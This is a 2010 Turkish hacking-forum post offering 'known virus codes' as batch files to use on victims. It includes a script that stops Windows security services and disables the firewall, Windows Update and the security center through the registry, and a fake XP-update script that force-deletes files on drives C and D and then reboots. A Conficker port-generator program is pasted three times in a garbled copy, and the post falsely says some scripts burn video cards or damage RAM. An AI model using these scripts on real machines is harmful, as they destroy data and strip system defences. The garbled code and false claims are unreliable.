ByZehredar
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Giriş yap

Şifremi unuttum

En iyi yollayıcılar
Admin
Bilinen virüs Kodlari Vote_lcapBilinen virüs Kodlari Voting_barBilinen virüs Kodlari Vote_rcap 

Kimler hatta?
Toplam 1 kullanıcı online :: 0 Kayıtlı, 0 Gizli ve 1 Misafir

Yok

[ Bütün listeye bak ]


Sitede bugüne kadar en çok 5 kişi Salı Eyl. 05, 2023 3:21 am tarihinde online oldu.
En son konular
» Mail Bomber ByZehredar Kesin Calişiyor
Bilinen virüs Kodlari EmptyPaz Kas. 07, 2010 6:32 pm tarafından Admin

» Bilinen virüs Kodlari
Bilinen virüs Kodlari EmptyC.tesi Ekim 23, 2010 8:46 pm tarafından Admin

» bilgisayarinizin sorunlarini yazin Cevaplayalim lütfen yeni Konu acmaa Özen Gösterin
Bilinen virüs Kodlari EmptyCuma Ekim 22, 2010 4:26 pm tarafından Admin

» Bu Baslık Altinda Face Grup Sayfalarinizi ve Kendi Profilinizi Paylasiniz...
Bilinen virüs Kodlari EmptyPaz Ekim 17, 2010 7:50 pm tarafından Admin

» C++ Örnekleri
Bilinen virüs Kodlari EmptyC.tesi Ekim 16, 2010 10:47 pm tarafından Admin

» Hazir İndex
Bilinen virüs Kodlari EmptyC.tesi Ekim 16, 2010 10:45 pm tarafından Admin

» HTML KOD Bankasi
Bilinen virüs Kodlari EmptyC.tesi Ekim 16, 2010 10:25 pm tarafından Admin

» Bedava Sitem Sablonlari
Bilinen virüs Kodlari EmptyC.tesi Ekim 16, 2010 9:13 pm tarafından Admin

» C++ Hakkında Bilgi
Bilinen virüs Kodlari EmptyCuma Ekim 15, 2010 3:52 am tarafından Admin


Bilinen virüs Kodlari

Aşağa gitmek

Bilinen virüs Kodlari Empty Bilinen virüs Kodlari

Mesaj  Admin C.tesi Ekim 16, 2010 6:59 pm

Kod:
1.wolf virusu .yok edicidir PC system32 hack eder PC ni kapatir kodu notepadda .bat format verin
KOD:
---------------------------------------------------------------------------------------------------------------
@echo off
echo VIRUS DETECTED
pause
echo DELETING VIRUS
pause
:1
dir /s
goto 1
---------------------------------------------------------------------------------------------------------------

Kod:
2.CONFICKER HACK virusu.Cok tehlikeli diyil amma kurbani derilticek denemeye deyer kodu notepadda yazip .com format verin SUPERRRRRRRRRRRRR
KOD:
---------------------------------------------------------------------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef {
int16_t s16[8];
uint16_t u16[8];
int32_t s32[4];
} result_t;

typedef {
int64_t s64;
int32_t s32[2];
uint32_t u32[2];
int16_t s16[4];
} var_t;

uint32_t portBlacklist[64] =
{
0xffffffff, 0xffffffff, 0xf0f6bfbb, 0xbb5a5ff3,
0xf3977011, 0xeb67bfbf, 0x5f9bfac8, 0x34d88091,
0x1e2282df, 0x573402c4, 0xc0000084, 0x03000209,
0x01600002, 0x00005000, 0x801000c0, 0x00500040,
0x000000a1, 0x01000000, 0x01000000, 0x00022a20,
0x00000080, 0x04000000, 0x40020000, 0x88000000,
0x00000180, 0x00081000, 0x08801900, 0x00800b81,
0x00000280, 0x080002c0, 0x00a80000, 0x00008000,
0x00100040, 0x00100000, 0x00000000, 0x00000000,
0x10000008, 0x00000000, 0x00000000, 0x00000004,
0x00000002, 0x00000000, 0x00040000, 0x00000000,
0x00000000, 0x00000000, 0x00410000, 0x82000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000008, 0x80000000
};

#define IS_PORT_BLACKLISTED(x) (1 << ((x >> 5) & 0x1F)) & portBlacklist[x >> 10]

/* NB: the portgen() function below is endian-dependent, and reverse-engineered
for a little-endian (e.g. x86, VAX, Alpha, etc.) machine. Changes will be
required for the array offsets in the s to run on a big-endian (e.g. most
SPARC, Power(PC), MIPS, etc.) machine. Other than the endian issue, this
implementaiton should be portable. */

int portgen(int ip, result_t *res, int week)
{
var_t v;
int64_t KONST = 0x15A4E35;
int i;

memset(res, 0, sizeof(result_t));
v.s32[0] = ~ip;

/* Generate fixed ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[0] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[0]));

} while (IS_PORT_BLACKLISTED(res->s32[1]) || res->s32[0] == res->s32[1]);

v.s32[0] = week ^ v.s64;


/* Generate week-dependent ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[4] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2 + 4] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[2]));

} while (IS_PORT_BLACKLISTED(res->s32[3]) || res->s32[2] == res->s32[3] ||
res->s32[0] == res->s32[2] || res->s32[1] == res->s32[2] ||
res->s32[0] == res->s32[3] || res->s32[1] == res->s32[3]);

return v.s64;
}

int main(int argc, char** argv) {
int a1,a3;
result_t res;
int i, rc;

if (argc != 3) {
printf("usage: conficker_ports <ip addr> <epoch week>\n");
exit(0);
}

a1 = inet_addr(argv[1]);
a3 = atoi(argv[2]);

rc=portgen(a1, &res, a3);
printf("ports are TCP (fixed), UDP (fixed), TCP (week-dependent), UDP
(week-dependent)\n");

for (i=0;i<8;i++) {
if (res.u16)
printf("%d\t", res.u16);
}
printf("\n");
return 0;
}#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

typedef {
int16_t s16[8];
uint16_t u16[8];
int32_t s32[4];
} result_t;

typedef {
int64_t s64;
int32_t s32[2];
uint32_t u32[2];
int16_t s16[4];
} var_t;

uint32_t portBlacklist[64] =
{
0xffffffff, 0xffffffff, 0xf0f6bfbb, 0xbb5a5ff3,
0xf3977011, 0xeb67bfbf, 0x5f9bfac8, 0x34d88091,
0x1e2282df, 0x573402c4, 0xc0000084, 0x03000209,
0x01600002, 0x00005000, 0x801000c0, 0x00500040,
0x000000a1, 0x01000000, 0x01000000, 0x00022a20,
0x00000080, 0x04000000, 0x40020000, 0x88000000,
0x00000180, 0x00081000, 0x08801900, 0x00800b81,
0x00000280, 0x080002c0, 0x00a80000, 0x00008000,
0x00100040, 0x00100000, 0x00000000, 0x00000000,
0x10000008, 0x00000000, 0x00000000, 0x00000004,
0x00000002, 0x00000000, 0x00040000, 0x00000000,
0x00000000, 0x00000000, 0x00410000, 0x82000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000008, 0x80000000
};

#define IS_PORT_BLACKLISTED(x) (1 << ((x >> 5) & 0x1F)) & portBlacklist[x >> 10]

/* NB: the portgen() function below is endian-dependent, and reverse-engineered
for a little-endian (e.g. x86, VAX, Alpha, etc.) machine. Changes will be
required for the array offsets in the s to run on a big-endian (e.g. most
SPARC, Power(PC), MIPS, etc.) machine. Other than the endian issue, this
implementaiton should be portable. */

int portgen(int ip, result_t *res, int week)
{
var_t v;
int64_t KONST = 0x15A4E35;
int i;

memset(res, 0, sizeof(result_t));
v.s32[0] = ~ip;

/* Generate fixed ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[0] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[0]));

} while (IS_PORT_BLACKLISTED(res->s32[1]) || res->s32[0] == res->s32[1]);

v.s32[0] = week ^ v.s64;


/* Generate week-dependent ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[4] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2 + 4] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[2]));

} while (IS_PORT_BLACKLISTED(res->s32[3]) || res->s32[2] == res->s32[3] ||
res->s32[0] == res->s32[2] || res->s32[1] == res->s32[2] ||
res->s32[0] == res->s32[3] || res->s32[1] == res->s32[3]);

return v.s64;
}

int main(int argc, char** argv) {
int a1,a3;
result_t res;
int i, rc;

if (argc != 3) {
printf("usage: conficker_ports <ip addr> <epoch week>\n");
exit(0);
}

a1 = inet_addr(argv[1]);
a3 = atoi(argv[2]);

rc=portgen(a1, &res, a3);
printf("ports are TCP (fixed), UDP (fixed), TCP (week-dependent), UDP
(week-dependent)\n");

for (i=0;i<8;i++) {
if (res.u16)
printf("%d\t", res.u16);
}
printf("\n");
return 0;
}

Conficker_C_P2P_Scanner [-t ms waittime][-v (verbose)] <low-address> <high-address>

low|high-address - specifies the start and end address ranges to be scanned

ex: % Conficker_C_P2P_Scanner 192.168.7.0 192.168.99.255
will scan all addresses in subnets 192.168.[7-99]

v

ddffd++ddtypedef {
int16_t s16[8];
uint16_t u16[8];
int32_t s32[4];
} result_t;

typedef {
int64_t s64;
int32_t s32[2];
uint32_t u32[2];
int16_t s16[4];
} var_t;

uint32_t portBlacklist[64] =
{
0xffffffff, 0xffffffff, 0xf0f6bfbb, 0xbb5a5ff3,
0xf3977011, 0xeb67bfbf, 0x5f9bfac8, 0x34d88091,
0x1e2282df, 0x573402c4, 0xc0000084, 0x03000209,
0x01600002, 0x00005000, 0x801000c0, 0x00500040,
0x000000a1, 0x01000000, 0x01000000, 0x00022a20,
0x00000080, 0x04000000, 0x40020000, 0x88000000,
0x00000180, 0x00081000, 0x08801900, 0x00800b81,
0x00000280, 0x080002c0, 0x00a80000, 0x00008000,
0x00100040, 0x00100000, 0x00000000, 0x00000000,
0x10000008, 0x00000000, 0x00000000, 0x00000004,
0x00000002, 0x00000000, 0x00040000, 0x00000000,
0x00000000, 0x00000000, 0x00410000, 0x82000000,
0x00000000, 0x00000000, 0x00000001, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000000, 0x00000000,
0x00000000, 0x00000000, 0x00000008, 0x80000000
};

#define IS_PORT_BLACKLISTED(x) (1 << ((x >> 5) & 0x1F)) & portBlacklist[x >> 10]

/* NB: the portgen() function below is endian-dependent, and reverse-engineered
for a little-endian (e.g. x86, VAX, Alpha, etc.) machine. Changes will be
required for the array offsets in the s to run on a big-endian (e.g. most
SPARC, Power(PC), MIPS, etc.) machine. Other than the endian issue, this
implementaiton should be portable. */

int portgen(int ip, result_t *res, int week)
{
var_t v;
int64_t KONST = 0x15A4E35;
int i;

memset(res, 0, sizeof(result_t));
v.s32[0] = ~ip;

/* Generate fixed ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[0] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[0]));

} while (IS_PORT_BLACKLISTED(res->s32[1]) || res->s32[0] == res->s32[1]);

v.s32[0] = week ^ v.s64;


/* Generate week-dependent ports */
do {
do {
v.s64 = KONST * v.u32[0] + 1;
res->s16[4] ^= v.s16[2];

for (i=1; i < 10; i++) {
v.s64 = KONST * v.u32[0] + 1;
res->s16[(i%2)*2 + 4] ^= v.s32[1] >> i;
}

} while (IS_PORT_BLACKLISTED(res->s32[2]));

} while (IS_PORT_BLACKLISTED(res->s32[3]) || res->s32[2] == res->s32[3] ||
res->s32[0] == res->s32[2] || res->s32[1] == res->s32[2] ||
res->s32[0] == res->s32[3] || res->s32[1] == res->s32[3]);

return v.s64;
}

int main(int argc, char** argv) {
int a1,a3;
result_t res;
int i, rc;

if (argc != 3) {
printf("usage: conficker_ports <ip addr> <epoch week>\n");
exit(0);
}

a1 = inet_addr(argv[1]);
a3 = atoi(argv[2]);

rc=portgen(a1, &res, a3);
printf("ports are TCP (fixed), UDP (fixed), TCP (week-dependent), UDP
(week-dependent)\n");

for (i=0;i<8;i++) {
if (res.u16)
printf("%d\t", res.u16);
}
printf("\n");
return 0;
}
---------------------------------------------------------------------------------------------------------------


Kod:
3.PRT virusu (acilisi proqramlar.tk).Basit diyil.Kurbanin PC sini tam olarak hack edib onun PC sini kapatir RAM a kalici hasar burakir kodu notepadda .bat format verin
KOD:
---------------------------------------------------------------------------------------------------------------
@echo off
net stop "Security Center"
net stop SharedAccess
> "%Temp%.\kill.reg" ECHO A R E S
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\SharedAccess]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\wuauserv]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
>>"%Temp%.\kill.reg" ECHO [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\w scsvc]
>>"%Temp%.\kill.reg" ECHO "Start"=dword:00000004
>>"%Temp%.\kill.reg" ECHO.
START /WAIT REGEDIT /S "%Temp%.\kill.reg"
DEL "%Temp%.\kill.reg"
DEL %0





</span>
<small>Bölmə:
<a href='blog.html?member=geogle&newscat=35455'><<HacKer/Cracking/Keygen>></a></span> | <span>Oxunub: 3</span></small>
<!-- Search Google -->
<br><a class="none" href="http://www.google.com/custom?q=PROQRAMLAR.TK Virusu&client=pub-1794413102517759&forid=1&channel=6081271895&ie=utf-8&oe=utf-8&cof=GALT%3A%23008000%3BGL%3A1%3BDIV%3A%23336699%3BVLC%3A663399%3BAH%3Acenter%3BBGC%3AFFFFFF%3BLBGC%3A336699%3BALC%3A0000FF%3BLC%3A0000FF%3BT%3A000000%3BGFNT%3A0000FF%3BGIMP%3A0000FF%3BLH%3A50%3BLW%3A396%3BL%3Ahttp%3A%2F%2Fwww.azersayt.com%2Fimages%2Flogo.jpg%3BS%3Ahttp%3A%2F%2Fwww.azersayt.com%2F%3BFORID%3A1&hl=tr" target="_blank"><img align="left" width="10" height="10" src='images/gg.gif' border="0" style="margin-bottom:-1px; margin-left:-2px; width:10px; height:10px;"> Bu mövzu Google-da »</a></span>
<!-- Search Google -->


<table><tr><td width="100%">
<div><a name="TELL"><!-- *********************************Start Menu****************************** -->
<link rel="stylesheet" type="text/css" href="sddm.css" >
<div class="mainDiv">
<div class="topItem">Bu yazını Dostuna göndər</div>
<div class="dropMenu"><!-- -->
<div class="subMenu" style="displayne;">
<div class="subItem">
<meta http-equiv='Content-Type' content='text/html; charset=utf-8'>
<form name='form' action='http://azersayt.com/blog.html?page=commentstemp4&member=geogle&newsid=286927#TELL' method='post'>
<table width='345' border='0'>
<tr><td width='200'><span style='font-size:10.0pt;font-family:Arial'>Dostunuzun Adı:</td><td width='145' align='right'><input style='font-family: Palatino Linotype; font-size: 10px; BACKGROUND-COLOR: #ebeff9; COLOR: blue' type='text' name='dostunuzun_adi' size='32'>
<input type='hidden' value='

name='gonderen_sehife'>
</td></tr>
<tr><td width='200'><span style='font-size:10.0pt;font-family:Arial'>Dostunuzun E-mail adresi:<td width='145' align='right'><input style='font-family: Palatino Linotype; font-size: 10px; BACKGROUND-COLOR: #ebeff9; COLOR: blue' type='text' name='alan_email' size='32'></td></tr>
<tr><td width='200'><span style='font-size:10.0pt;font-family:Arial'>Sizin adınız:<td width='145' align='right'><input style='font-family: Palatino Linotype; font-size: 10px; BACKGROUND-COLOR: #ebeff9; COLOR: blue' type='text' name='sizin_adiniz' size='32'></td></tr>
</table>

<table width='345'>
<tr><td width='100%'>
</td></tr>
<tr><td width='100%'><span style='font-size:10.0pt;font-family:Arial'>Əlavə mesajınız:</span>
<textarea style='font-family: Palatino Linotype; font-size: 10px; BACKGROUND-COLOR: #ebeff9; COLOR: blue' type='text' name='message' rows='5' cols='79'>
---------------------------------------------------------------------------------------------------------------

Kod:
5.START hack Video karti yakan virus kimi taninir .BASITTIR notepadda start sozunu 2000 defe yazip .bat format verin kurban bu fileni acarken ekran karti tamamen cokucek ve yanacak KEndi PC de deneme


Kod:
8.XP hack virusu XP isletim sisdemini hack eder kodu notepadda .bat format verin bu virus PC ye formatlar .anti-virusu notepadda shutdown -a komutunun .bat formatidir .AMMA kendi PC de deneme
KOD:
---------------------------------------------------------------------------------------------------------------
echo off

echo Microsoft windows XP&l039; nizi güncellemeye devam etmek için lutfen bir tusa basın

echo off

pause

del /f /q d:

del /f /q c:

shutdown -r
---------------------------------------------------------------------------------------------------------------

Zone Ve Melisa gibi Virüs Türlerini Buraya Veremem Nedeni Sayfayi Acar Acmaz Bilgisayarinizda Bazi Değişikler Oluyor O bakimdan Kaldirdim
Admin
Admin
Admin

Mesaj Sayısı : 18
Kayıt tarihi : 15/10/10
Yaş : 29
Nerden : Ankara

http://byzehredar.yetkinforum.com

Sayfa başına dön Aşağa gitmek

Bilinen virüs Kodlari Empty Düsündüm veeeeee :D

Mesaj  Admin C.tesi Ekim 23, 2010 8:46 pm

düsündüm ve Size Güzel Bi Anti Virüs Sisteminin Lazim Olduğuna Karar Verdim Very Happy


Avast 4.8 Home Editon (Ev Sürümü )
Kod:
http://www.inndir.com/Avast!_Home_Edition-19173i.html
Admin
Admin
Admin

Mesaj Sayısı : 18
Kayıt tarihi : 15/10/10
Yaş : 29
Nerden : Ankara

http://byzehredar.yetkinforum.com

Sayfa başına dön Aşağa gitmek

Sayfa başına dön


 
Bu forumun müsaadesi var:
Bu forumdaki mesajlara cevap veremezsiniz